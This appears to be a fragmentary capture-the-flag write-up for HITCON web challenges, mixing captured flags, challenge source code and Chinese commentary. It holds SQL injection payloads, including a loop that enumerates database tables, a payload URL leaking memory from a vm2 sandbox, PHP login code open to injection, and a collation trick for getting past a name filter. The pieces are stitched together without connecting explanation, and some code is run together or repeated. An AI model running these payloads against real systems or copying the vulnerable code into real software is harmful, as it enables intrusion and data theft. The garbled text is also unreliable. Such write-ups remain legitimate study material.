address=18AfZLTCK1ZByGLjbthXLKsZfcqy9N8Kjf' union select '1FeexV6bAHb8ybZjqQMjJrcCrHGW9sb6uF' limit 1,1#&flag_id=flag1&submit=
get
1 2 3 4 5
hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}
Well done! Aww yeah, you successfully read this important message. Thank you for buying flag. Here's your flag: Flag2 is: hitcon{u51n6_07h3r_6uy5_b17c0n_70_byp455_ch3ck1n6_15_fun!!}
for i in range(0, 100): address = r"d' AND 1=2 UNION ALL SELECT table_name from information_schema.tables LIMIT {},1 #".format(str(i)) print(address) data = {'address': address, 'flag_id': 'flag2', 'submit': 1}
var randomstring = require("randomstring"); var express = require("express"); var {VM} = require("vm2"); var fs = require("fs");
var app = express(); var flag = require("./config.js").flag
app.get("/", function (req, res) { res.header("Content-Type", "text/plain");
/* Orange is so kind so he put the flag here. But if you can guess correctly :P */ eval("var flag_" + randomstring.generate(64) + " = \"hitcon{" + flag + "}\";") if (req.query.data && req.query.data.length <= 12) { var vm = new VM({ timeout: 1000 }); console.log(req.query.data); res.send("eval ->" + vm.run(req.query.data)); } else { res.send(fs.readFileSync(__filename).toString()); } });
app.listen(3000, function () { console.log("listening on port 3000!");
http://52.198.115.130:3000/?data[]=for (varstep = 0; step < 100000; step++) {var buf = (new Buffer(100)).toString('ascii');if (buf.indexOf("hitcon{") !== -1) {break;}}buf; flag: hitcon{4nother h34rtbleed in n0dejs? ordo u solved by other way?}
from flask import Response from flask import request, session from flask import redirect, url_for, safe_join, abort from flask import render_template_string
$sql = sprintf("SELECT * FROM users WHERE username='%s' AND password='%s'", $username, $password); var_dump($sql);
if ( $username == 'orange' || stripos($sql, 'orange') != false ) { $this->__die("Orange is so shy. He do not want to see you."); }
$obj = $this->__query($sql); if ( $obj != false && $obj->role == 'admin' ) { $this->__die("Hi, Orange! Here is your flag: " . $FLAG); } else { $this->__die("Admin only!"); } }
functionsource(){ highlight_file(__FILE__); }
function__conn(){ global $db_host, $db_name, $db_user, $db_pass, $DEBUG;
if (!$this->conn) $this->conn = mysql_connect($db_host, $db_user, $db_pass);
mysql_select_db($db_name, $this->conn);
if ($DEBUG) { $sql = "CREATE TABLE IF NOT EXISTS users ( username VARCHAR(64), password VARCHAR(64), role VARCHAR(64) ) CHARACTER SET utf8"; $this->__query($sql, $back=false);
if ( $username == 'orange' || stripos($sql, 'orange') != false ) { $this->__die("Orange is so shy. He do not want to see you."); }
这里开始一直没有想法,但是后来看到了这个
1
MYSQL 中 utf8_unicode_ci 和 utf8_general_ci 两种编码格式, utf8_general_ci不区分大小写, Ä = A, Ö = O, Ü = U 这三种条件都成立, 对于utf8_general_ci下面的等式成立:ß = s ,但是,对于utf8_unicode_ci下面等式才成立:ß = ss 。